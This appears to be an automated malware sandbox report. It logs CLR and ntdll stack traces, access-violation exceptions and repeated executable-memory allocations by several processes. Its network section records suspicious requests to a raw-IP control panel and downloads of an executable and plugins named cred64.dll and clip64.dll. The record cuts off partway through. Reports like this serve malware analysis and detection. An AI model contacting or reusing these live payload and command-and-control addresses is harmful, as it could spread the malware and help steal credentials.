DllGetClassObjectInternal+0x3cf99 CorDllMainForThunk-0x4f562 clr+0x102012 @ 0x72592012
DllGetClassObjectInternal+0x41789 CorDllMainForThunk-0x4ad72 clr+0x106802 @ 0x72596802
DllGetClassObjectInternal+0x417dc CorDllMainForThunk-0x4ad1f clr+0x106855 @ 0x72596855
DllGetClassObjectInternal+0x40b7e CorDllMainForThunk-0x4b97d clr+0x105bf7 @ 0x72595bf7
DllGetClassObjectInternal+0x3a1da CorDllMainForThunk-0x52321 clr+0xff253 @ 0x7258f253
CreateAssemblyNameObject+0x368 GetMetaDataInternalInterface-0x38107 clr+0x2d801 @ 0x724bd801
CreateAssemblyNameObject+0x8d GetMetaDataInternalInterface-0x383e2 clr+0x2d526 @ 0x724bd526
mscorlib+0x3915ca @ 0x717815ca
mscorlib+0x34f009 @ 0x7173f009
mscorlib+0x2d5f6a @ 0x716c5f6a
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8681048
registers.edi: 53
registers.eax: 83308560
registers.ebp: 8681180
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllUnregisterServerInternal-0x7fe0 clr+0x2114 @ 0x72492114
DllUnregisterServerInternal-0x7fa5 clr+0x214f @ 0x7249214f
GetPrivateContextsPerfCounters+0xd5b3 DllGetActivationFactoryImpl-0x72b2 clr+0x95535 @ 0x72525535
CreateAssemblyEnum+0x40d CreateInstallReferenceEnum-0x8c3 clr+0x38f6f2 @ 0x7281f6f2
CreateAssemblyEnum+0x36b CreateInstallReferenceEnum-0x965 clr+0x38f650 @ 0x7281f650
CreateAssemblyEnum+0x188 CreateInstallReferenceEnum-0xb48 clr+0x38f46d @ 0x7281f46d
mscorlib+0x3916f5 @ 0x717816f5
mscorlib+0x34f024 @ 0x7173f024
mscorlib+0x2d5f6a @ 0x716c5f6a
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetClassObjectInternal+0x3563c CorDllMainForThunk-0x56ebf clr+0xfa6b5 @ 0x7258a6b5
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b d8 0b fa 89
exception.symbol: LdrUnlockLoaderLock+0x2cc RtlInitUnicodeStringEx-0xe6b ntdll+0x36f08
exception.instruction: movzx eax, word ptr [esi]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 225032
exception.address: 0x76f46f08
registers.esp: 8683840
registers.edi: 54
registers.eax: 83308560
registers.ebp: 8683972
registers.edx: 4294901824
registers.ebx: 63
registers.esi: 83308568
registers.ecx: 82754216
1 0 0

__exception__

 stacktrace: 
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
FindFirstFileExW+0x41f FindFirstChangeNotificationA-0x13a kernelbase+0x19973 @ 0x75989973
New_kernel32_FindFirstFileExW@24+0x56 New_kernel32_FindResourceA@12-0xf4 @ 0x733c8325
FindFirstFileW+0x16 FindNextFileA-0x9 kernelbase+0x19c48 @ 0x75989c48
GetLongPathNameW+0x1ef FindActCtxSectionStringW-0x20c kernel32+0x1a504 @ 0x755ca504
path_get_full_pathW+0x474 path_get_full_path_handle-0xa8 @ 0x733bd6eb
path_get_full_path_objattr+0x3d reg_get_key-0x3d2 @ 0x733bd8d6
New_ntdll_NtCreateFile@44+0x16f New_ntdll_NtCreateKey@28-0xd9 @ 0x733cdc35
CreateFileW+0x35e CreateFileA-0x13d kernelbase+0x1b634 @ 0x7598b634
CreateFileW+0x4a GetFullPathNameW-0x12e kernel32+0x13fa6 @ 0x755c3fa6
CreateNGenPdbWriter+0x693c7 diasymreader+0x82d3b @ 0x6d1d2d3b
CreateNGenPdbWriter+0x6ab4a diasymreader+0x844be @ 0x6d1d44be
CreateNGenPdbWriter+0x699d1 diasymreader+0x83345 @ 0x6d1d3345
CreateNGenPdbWriter+0x61eb4 diasymreader+0x7b828 @ 0x6d1cb828
CreateNGenPdbWriter+0x62ce6 diasymreader+0x7c65a @ 0x6d1cc65a
CreateNGenPdbWriter+0x7b099 diasymreader+0x94a0d @ 0x6d1e4a0d
CreateNGenPdbWriter+0x7a005 diasymreader+0x93979 @ 0x6d1e3979
CreateNGenPdbWriter+0x7ae3f diasymreader+0x947b3 @ 0x6d1e47b3
CreateNGenPdbWriter+0x7ab77 diasymreader+0x944eb @ 0x6d1e44eb
CreateNGenPdbWriter+0x6c4fc diasymreader+0x85e70 @ 0x6d1d5e70
CreateNGenPdbWriter+0xc08f diasymreader+0x25a03 @ 0x6d175a03
CreateNGenPdbWriter+0x4cf1 diasymreader+0x1e665 @ 0x6d16e665
DllGetClassObjectInternal-0x3775 diasymreader+0x16029 @ 0x6d166029
DllGetClassObjectInternal-0x808 diasymreader+0x18f96 @ 0x6d168f96
GetMetaDataPublicInterfaceFromInternal+0x324 CopyPDBs-0x618 clr+0x19562a @ 0x7262562a
StrongNameSignatureVerification+0x839b GetMetaDataPublicInterfaceFromInternal-0x34b5 clr+0x191e51 @ 0x72621e51
StrongNameSignatureVerification+0x854e GetMetaDataPublicInterfaceFromInternal-0x3302 clr+0x192004 @ 0x72622004
mscorlib+0x355147 @ 0x71745147
mscorlib+0x32fa63 @ 0x7171fa63
mscorlib+0x36bcca @ 0x7175bcca
mscorlib+0x364c60 @ 0x71754c60
mscorlib+0x984f75 @ 0x71d74f75
mscorlib+0x985a6d @ 0x71d75a6d
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
CreateHistoryReader+0xf3f4 PostErrorVA-0x159b6b clr+0x21ec39 @ 0x726aec39
CreateHistoryReader+0x12630 PostErrorVA-0x15692f clr+0x221e75 @ 0x726b1e75
CreateHistoryReader+0x12716 PostErrorVA-0x156849 clr+0x221f5b @ 0x726b1f5b
CreateHistoryReader+0x12a11 PostErrorVA-0x15654e clr+0x222256 @ 0x726b2256
CreateHistoryReader+0x123ff PostErrorVA-0x156b60 clr+0x221c44 @ 0x726b1c44
CreateHistoryReader+0x124d0 PostErrorVA-0x156a8f clr+0x221d15 @ 0x726b1d15
_CorDllMain+0x155 _CorExeMain2-0x277 clr+0x1dbf68 @ 0x7266bf68
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bb7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bb4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e
exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e
exception.instruction: mov eax, dword ptr [esi + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189342
exception.address: 0x76f3e39e
registers.esp: 8692196
registers.edi: 82786512
registers.eax: 3
registers.ebp: 8692248
registers.edx: 82786520
registers.ebx: 82786520
registers.esi: 1078174630
registers.ecx: 9043968
1 0 0

__exception__

 stacktrace: 
0xb2a303
0xb2a10e
0xb24350
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72557610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bb7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bb4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 d0 8b 45 f4 05 3b fe ff ff 8b 15
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb2b223
registers.esp: 2813812
registers.edi: 2813868
registers.eax: 0
registers.ebp: 2813884
registers.edx: 0
registers.ebx: 2814292
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xb2a303
0xb2a10e
0xb24350
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72557610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bb7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bb4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 d0 8b 45 f4 05 3b fe ff ff 8b 15
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb2b223
registers.esp: 2813812
registers.edi: 2813868
registers.eax: 0
registers.ebp: 2813884
registers.edx: 0
registers.ebx: 2814292
registers.esi: 0
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.172.128.5/v8sjh3hs8/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.172.128.5/v8sjh3hs8/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.113/hv.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.5/v8sjh3hs8/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.172.128.5/v8sjh3hs8/Plugins/clip64.dll
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/A54sKxhY
request POST http://185.172.128.5/v8sjh3hs8/index.php
request POST http://185.172.128.5/v8sjh3hs8/index.php?scr=1
request GET http://185.172.128.113/hv.exe
request GET http://185.172.128.5/v8sjh3hs8/Plugins/cred64.dll
request GET http://185.172.128.5/v8sjh3hs8/Plugins/clip64.dll
request GET https://pastebin.com/raw/A54sKxhY
request POST http://185.172.128.5/v8sjh3hs8/index.php
request POST http://185.172.128.5/v8sjh3hs8/index.php?scr=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00360000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00370000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00380000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00390000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00250000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00290000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002b0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2716
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 720896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72492000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02260000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00852000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00885000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0088b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00887000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
